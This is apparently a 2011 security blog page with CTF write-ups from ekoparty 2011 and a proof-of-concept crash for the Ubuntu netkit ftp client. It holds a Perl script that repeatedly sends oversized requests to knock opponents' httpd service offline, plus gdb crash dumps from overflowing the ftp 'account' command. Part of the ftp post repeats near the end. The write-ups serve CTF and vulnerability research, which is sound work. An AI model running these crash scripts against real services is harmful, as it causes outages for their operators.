16 oct 2011

Custom 404 Page Finder


Script to find directories & files for a website wich has custom 404 code's (and returns 200 OK instead of 404 Not Found).
It simple use a pattern matching (of the custom'ed 404 page) to remove those directories and files that do not exist.
Requires a directory/file list.

Code:

http://pastebin.com/JmKccDK4
Publicado por localh0t en 12:23 0 comentarios
Etiquetas: , , ,

26 sept 2011

ekoparty 2011 CTF [httpd daemon buffer overflow] [Attack-Defense writeup]

We continue with the binaries presented in the ekoparty 2011 CTF.
This time we analyze the "daemon1" which is the httpd server running on port 5050.
After a bit of fuzzing, we discovered that the server crash with long requests (GET /XXX [...])
  











Here we can see the crash in gdb:





















First we try to exploit the daemon1 and get flag.txt token. But due to time and some protection of the binary we decided to use it to attack and defend at the same time.

Note: If the Scoreboard bot detect's your port 5050 closed (or another daemon with different port running on the server), it will increase yout defense points (wich is a bad thing, you have to keep your attack points higher as possible and defense points lower as possible). With that in mind, we can use this for:

Attack:

Let's make some dirty code to down the 5050 port's of the another server's:

#!/usr/bin/perl
use LWP::Simple;

($host, $port) = @ARGV;
$payload = "A"x600;

while(1)
{
    $response=get("http://".$host.":".$port."/".$payload);
    sleep(1);
}

__END__

With this, opposites teams "wins" defense points, and because of that, loose overall points (The scoreboard bot checks and cannot connect to the port 5050 of the another teams).

Defense: 

2 options here, first make a script that automatically wake up your httpd server after crash (not very reliable), and two, listen a non-vulnerable server (like apache) on port 5050 (Not tested, we do not know if it meets the rules).

writeup by: localh0t (@mattdch) 
Publicado por localh0t en 18:24 0 comentarios
Etiquetas: , , , , , , , ,

ekoparty 2011 CTF [Bin] [writeup]

During the last week I have been in the ekoparty security conference, held in Buenos Aires, Argentina. My team (Kcho Team) was pleased to win the competition (after a long-stressed battle). Here is the Bin writeup:



After some scanning with Nmap, we realize that the 10 IP's (10.10.1-10.68) had ports: 3030, 2011 and 5050 open. Moreover, in the port 5050 was running an http daemon. After quick dir-scan, we discover an interesting file in /image/bin in the 10 servers (different for different servers):


C2726=i ?@AC@3=6>@
7=28i `2675_`432672hg6`4c3f5c46cfb45e`
4@56i ab`ahbcdhf`ae`ae

Analyzing this springs to mind "ROT 13", but with no luck. After quick scripting, ROT47
is the answer:


rafael: noproblemo  
flag: 1aefd01cbaefa98e1c4b7d4ce473cd61  
code:   2312934597126126

rafael : noproblemo => SSH Login for that server.
1aefd01cbaefa98e1c4b7d4ce473cd61  => Flag to submit for "Bin" challenge.
2312934597126126 => code to use after login. Code can be used one time on each server. Some codes also show flags after succesful login.


writeup by: localh0t (@mattdch)
Publicado por localh0t en 17:06 0 comentarios
Etiquetas: , , , ,

8 sept 2011

Ubuntu <= 11.04 ftp client Local Buffer Overflow Crash PoC

Ubuntu 11 (and below) ftp client seems to crash when passing large arguments to the "account" command, while a connection is made to any ftp server. Example:

Ubuntu 11.04 x86:
=================

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.9 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x50)[0x27fdf0]
/lib/i386-linux-gnu/libc.so.6(+0xe4cca)[0x27ecca]
/lib/i386-linux-gnu/libc.so.6(+0xe41ed)[0x27e1ed]
/usr/bin/ftp[0x804b5e2]
/usr/bin/ftp[0x8055ead]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xe7)[0x1b0e37]
/usr/bin/ftp[0x8049d61]
======= Memory map: ========
00110000-0012c000 r-xp 00000000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012c000-0012d000 r--p 0001b000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012d000-0012e000 rw-p 0001c000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012e000-0012f000 r-xp 00000000 00:00 0          [vdso]
0012f000-0015d000 r-xp 00000000 08:01 524378     /lib/libreadline.so.6.2
0015d000-0015e000 r--p 0002e000 08:01 524378     /lib/libreadline.so.6.2
0015e000-00161000 rw-p 0002f000 08:01 524378     /lib/libreadline.so.6.2
00161000-00162000 rw-p 00000000 00:00 0
00162000-00196000 r-xp 00000000 08:01 524347     /lib/libncurses.so.5.7
00196000-00197000 ---p 00034000 08:01 524347     /lib/libncurses.so.5.7
00197000-00199000 r--p 00034000 08:01 524347     /lib/libncurses.so.5.7
00199000-0019a000 rw-p 00036000 08:01 524347     /lib/libncurses.so.5.7
0019a000-002f4000 r-xp 00000000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f4000-002f5000 ---p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f5000-002f7000 r--p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f7000-002f8000 rw-p 0015c000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f8000-002fb000 rw-p 00000000 00:00 0
002fb000-002fd000 r-xp 00000000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fd000-002fe000 r--p 00001000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fe000-002ff000 rw-p 00002000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002ff000-00309000 r-xp 00000000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
00309000-0030a000 r--p 00009000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030a000-0030b000 rw-p 0000a000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030b000-00311000 r-xp 00000000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00311000-00312000 r--p 00005000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00312000-00313000 rw-p 00006000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00313000-00326000 r-xp 00000000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00326000-00327000 r--p 00012000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00327000-00328000 rw-p 00013000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00328000-0032a000 rw-p 00000000 00:00 0
0032a000-00333000 r-xp 00000000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00333000-00334000 r--p 00008000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00334000-00335000 rw-p 00009000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00335000-0034f000 r-xp 00000000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
0034f000-00350000 r--p 00019000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
00350000-00351000 rw-p 0001a000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
08048000-08059000 r-xp 00000000 08:01 1573707    /usr/bin/netkit-ftp
08059000-0805a000 r--p 00011000 08:01 1573707    /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00012000 08:01 1573707    /usr/bin/netkit-ftp
0805b000-080ab000 rw-p 00000000 00:00 0          [heap]
b7dee000-b7fee000 r--p 00000000 08:01 1581098    /usr/lib/locale/locale-archive
b7fee000-b7ff0000 rw-p 00000000 00:00 0
b7ff9000-b7ffa000 r--p 002a1000 08:01 1581098    /usr/lib/locale/locale-archive
b7ffa000-b8000000 rw-p 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0x0012e416 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0xc8e    3214
edx            0x6    6
ebx            0xc8e    3214
esp            0xbfffdde4    0xbfffdde4
ebp            0xbfffddf0    0xbfffddf0
esi            0x0    0
edi            0x2f6ff4    3108852
eip            0x12e416    0x12e416 <__kernel_vsyscall+2>
eflags         0x246    [ PF ZF IF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

============================================================================================================================================================

Ubuntu 11.04 x64 and Backtrack 5 R1 (which is based in Ubuntu) crash, too:
==========================================================================

Ubuntu 11.04 x64:
=================

$ gdb /usr/bin/ftp
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Para las instrucciones de informe de errores, vea:
<http://www.gnu.org/software/gdb/bugs/>...
Leyendo símbolos desde /usr/bin/ftp...(no se encontraron símbolos de depuración)hecho.
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.5 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff76c01d7]
/lib/x86_64-linux-gnu/libc.so.6(+0xfd0f0)[0x7ffff76bf0f0]
/lib/x86_64-linux-gnu/libc.so.6(+0xfc264)[0x7ffff76be264]
/usr/bin/ftp[0x404039]
/usr/bin/ftp[0x40ec18]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xff)[0x7ffff75e0eff]
/usr/bin/ftp[0x402889]
======= Memory map: ========
00400000-00414000 r-xp 00000000 08:03 262461                             /usr/bin/netkit-ftp
00613000-00614000 r--p 00013000 08:03 262461                             /usr/bin/netkit-ftp
00614000-00616000 rw-p 00014000 08:03 262461                             /usr/bin/netkit-ftp
00616000-00687000 rw-p 00000000 00:00 0                                  [heap]
7ffff62e2000-7ffff62f7000 r-xp 00000000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff62f7000-7ffff64f6000 ---p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f6000-7ffff64f7000 r--p 00014000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f7000-7ffff64f8000 rw-p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f8000-7ffff6b82000 r--p 00000000 08:03 269561                     /usr/lib/locale/locale-archive
7ffff6b82000-7ffff6b8d000 r-xp 00000000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6b8d000-7ffff6d8c000 ---p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8c000-7ffff6d8d000 r--p 0000a000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8d000-7ffff6d8e000 rw-p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8e000-7ffff6da5000 r-xp 00000000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6da5000-7ffff6fa4000 ---p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa4000-7ffff6fa5000 r--p 00016000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa5000-7ffff6fa6000 rw-p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa6000-7ffff6fa8000 rw-p 00000000 00:00 0
7ffff6fa8000-7ffff6fb0000 r-xp 00000000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff6fb0000-7ffff71af000 ---p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71af000-7ffff71b0000 r--p 00007000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b0000-7ffff71b1000 rw-p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b1000-7ffff71bd000 r-xp 00000000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff71bd000-7ffff73bc000 ---p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bc000-7ffff73bd000 r--p 0000b000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bd000-7ffff73be000 rw-p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73be000-7ffff73c0000 r-xp 00000000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff73c0000-7ffff75c0000 ---p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c0000-7ffff75c1000 r--p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c1000-7ffff75c2000 rw-p 00003000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c2000-7ffff774c000 r-xp 00000000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff774c000-7ffff794b000 ---p 0018a000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794b000-7ffff794f000 r--p 00189000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794f000-7ffff7950000 rw-p 0018d000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff7950000-7ffff7956000 rw-p 00000000 00:00 0
7ffff7956000-7ffff7996000 r-xp 00000000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7996000-7ffff7b95000 ---p 00040000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b95000-7ffff7b99000 r--p 0003f000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b99000-7ffff7b9a000 rw-p 00043000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b9a000-7ffff7bd3000 r-xp 00000000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7bd3000-7ffff7dd3000 ---p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd3000-7ffff7dd5000 r--p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd5000-7ffff7ddb000 rw-p 0003b000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7ddb000-7ffff7ddc000 rw-p 00000000 00:00 0
7ffff7ddc000-7ffff7dfd000 r-xp 00000000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7fcf000-7ffff7fd3000 rw-p 00000000 00:00 0
7ffff7ff5000-7ffff7ffb000 rw-p 00000000 00:00 0
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00020000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7ffd000-7ffff7fff000 rw-p 00021000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]

Program received signal SIGABRT, Aborted.
0x00007ffff75f5d05 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
64    ../nptl/sysdeps/unix/sysv/linux/raise.c: No existe el fichero o el directorio.
    in ../nptl/sysdeps/unix/sysv/linux/raise.c
(gdb) i r
rax            0x0    0
rbx            0x0    0
rcx            0xffffffffffffffff    -1
rdx            0x6    6
rsi            0x5dea    24042
rdi            0x5dea    24042
rbp            0x7fffffffcfd0    0x7fffffffcfd0
rsp            0x7fffffffc608    0x7fffffffc608
r8             0x7ffff770d8c0    140737344755904
r9             0x400660    4195936
r10            0x8    8
r11            0x246    582
r12            0x9    9
r13            0x3a    58
r14            0x3a    58
r15            0x5    5
rip            0x7ffff75f5d05    0x7ffff75f5d05 <raise+53>
eflags         0x246    [ PF ZF IF ]
cs             0x33    51
ss             0x2b    43
ds             0x0    0
es             0x0    0
fs             0x0    0
gs             0x0    0
(gdb)

============================================================================================================================================================

Backtrack 5 R1:
===============

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7eea390]
/lib/tls/i686/cmov/libc.so.6(+0xe12ca)[0xb7ee92ca]
/lib/tls/i686/cmov/libc.so.6(+0xe07de)[0xb7ee87de]
/usr/bin/ftp[0x804b57c]
/usr/bin/ftp[0x8055abd]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e1ebd6]
/usr/bin/ftp[0x8049cb1]
======= Memory map: ========
08048000-08059000 r-xp 00000000 08:01 153580     /usr/bin/netkit-ftp
08059000-0805a000 r--p 00010000 08:01 153580     /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00011000 08:01 153580     /usr/bin/netkit-ftp
0805b000-0808a000 rw-p 00000000 00:00 0          [heap]
b7d58000-b7d75000 r-xp 00000000 08:01 1180       /lib/libgcc_s.so.1
b7d75000-b7d76000 r--p 0001c000 08:01 1180       /lib/libgcc_s.so.1
b7d76000-b7d77000 rw-p 0001d000 08:01 1180       /lib/libgcc_s.so.1
b7d88000-b7d8f000 r--s 00000000 08:01 159757     /usr/lib/gconv/gconv-modules.cache
b7d8f000-b7dce000 r--p 00000000 08:01 161313     /usr/lib/locale/en_US.utf8/LC_CTYPE
b7dce000-b7dd6000 r-xp 00000000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd6000-b7dd7000 r--p 00007000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd7000-b7dd8000 rw-p 00008000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd8000-b7deb000 r-xp 00000000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7deb000-b7dec000 r--p 00012000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7dec000-b7ded000 rw-p 00013000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7ded000-b7def000 rw-p 00000000 00:00 0
b7def000-b7df5000 r-xp 00000000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df5000-b7df6000 r--p 00006000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df6000-b7df7000 rw-p 00007000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df7000-b7e01000 r-xp 00000000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e01000-b7e02000 r--p 00009000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e02000-b7e03000 rw-p 0000a000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e03000-b7e04000 rw-p 00000000 00:00 0
b7e04000-b7e06000 r-xp 00000000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e06000-b7e07000 r--p 00001000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e07000-b7e08000 rw-p 00002000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e08000-b7f5b000 r-xp 00000000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5b000-b7f5c000 ---p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5c000-b7f5e000 r--p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5e000-b7f5f000 rw-p 00155000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5f000-b7f63000 rw-p 00000000 00:00 0
b7f63000-b7f97000 r-xp 00000000 08:01 1200       /lib/libncurses.so.5.7
b7f97000-b7f98000 ---p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f98000-b7f9a000 r--p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f9a000-b7f9b000 rw-p 00036000 08:01 1200       /lib/libncurses.so.5.7
b7f9b000-b7fca000 r-xp 00000000 08:01 1267       /lib/libreadline.so.6.1
b7fca000-b7fcb000 r--p 0002e000 08:01 1267       /lib/libreadline.so.6.1
b7fcb000-b7fce000 rw-p 0002f000 08:01 1267       /lib/libreadline.so.6.1
b7fce000-b7fcf000 rw-p 00000000 00:00 0
b7fdc000-b7fe2000 rw-p 00000000 00:00 0
b7fe2000-b7fe3000 r-xp 00000000 00:00 0          [vdso]
b7fe3000-b7ffe000 r-xp 00000000 08:01 1123       /lib/ld-2.11.1.so
b7ffe000-b7fff000 r--p 0001a000 08:01 1123       /lib/ld-2.11.1.so
b7fff000-b8000000 rw-p 0001b000 08:01 1123       /lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0xb7fe2422 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0x659    1625
edx            0x6    6
ebx            0x659    1625
esp            0xbfffdbfc    0xbfffdbfc
ebp            0xbfffdc08    0xbfffdc08
esi            0x0    0
edi            0xb7f5dff4    -1208623116
eip            0xb7fe2422    0xb7fe2422 <__kernel_vsyscall+2>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

Another Linux distribution did not crash, here is the example with Slackware 12:
================================================================================

Slackware 12:
=============

root@sl4ck1e:~# ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sorry, input line too long

ftp>




Ubuntu 11 (and below) ftp client seems to crash when passing large arguments to the "account" command, while a connection is made to any ftp server. Example:

Ubuntu 11.04 x86:
=================

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.9 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x50)[0x27fdf0]
/lib/i386-linux-gnu/libc.so.6(+0xe4cca)[0x27ecca]
/lib/i386-linux-gnu/libc.so.6(+0xe41ed)[0x27e1ed]
/usr/bin/ftp[0x804b5e2]
/usr/bin/ftp[0x8055ead]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xe7)[0x1b0e37]
/usr/bin/ftp[0x8049d61]
======= Memory map: ========
00110000-0012c000 r-xp 00000000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012c000-0012d000 r--p 0001b000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012d000-0012e000 rw-p 0001c000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012e000-0012f000 r-xp 00000000 00:00 0          [vdso]
0012f000-0015d000 r-xp 00000000 08:01 524378     /lib/libreadline.so.6.2
0015d000-0015e000 r--p 0002e000 08:01 524378     /lib/libreadline.so.6.2
0015e000-00161000 rw-p 0002f000 08:01 524378     /lib/libreadline.so.6.2
00161000-00162000 rw-p 00000000 00:00 0
00162000-00196000 r-xp 00000000 08:01 524347     /lib/libncurses.so.5.7
00196000-00197000 ---p 00034000 08:01 524347     /lib/libncurses.so.5.7
00197000-00199000 r--p 00034000 08:01 524347     /lib/libncurses.so.5.7
00199000-0019a000 rw-p 00036000 08:01 524347     /lib/libncurses.so.5.7
0019a000-002f4000 r-xp 00000000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f4000-002f5000 ---p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f5000-002f7000 r--p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f7000-002f8000 rw-p 0015c000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f8000-002fb000 rw-p 00000000 00:00 0
002fb000-002fd000 r-xp 00000000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fd000-002fe000 r--p 00001000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fe000-002ff000 rw-p 00002000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002ff000-00309000 r-xp 00000000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
00309000-0030a000 r--p 00009000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030a000-0030b000 rw-p 0000a000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030b000-00311000 r-xp 00000000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00311000-00312000 r--p 00005000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00312000-00313000 rw-p 00006000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00313000-00326000 r-xp 00000000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00326000-00327000 r--p 00012000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00327000-00328000 rw-p 00013000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00328000-0032a000 rw-p 00000000 00:00 0
0032a000-00333000 r-xp 00000000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00333000-00334000 r--p 00008000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00334000-00335000 rw-p 00009000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00335000-0034f000 r-xp 00000000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
0034f000-00350000 r--p 00019000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
00350000-00351000 rw-p 0001a000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
08048000-08059000 r-xp 00000000 08:01 1573707    /usr/bin/netkit-ftp
08059000-0805a000 r--p 00011000 08:01 1573707    /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00012000 08:01 1573707    /usr/bin/netkit-ftp
0805b000-080ab000 rw-p 00000000 00:00 0          [heap]
b7dee000-b7fee000 r--p 00000000 08:01 1581098    /usr/lib/locale/locale-archive
b7fee000-b7ff0000 rw-p 00000000 00:00 0
b7ff9000-b7ffa000 r--p 002a1000 08:01 1581098    /usr/lib/locale/locale-archive
b7ffa000-b8000000 rw-p 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0x0012e416 in __kernel_vsyscall ()
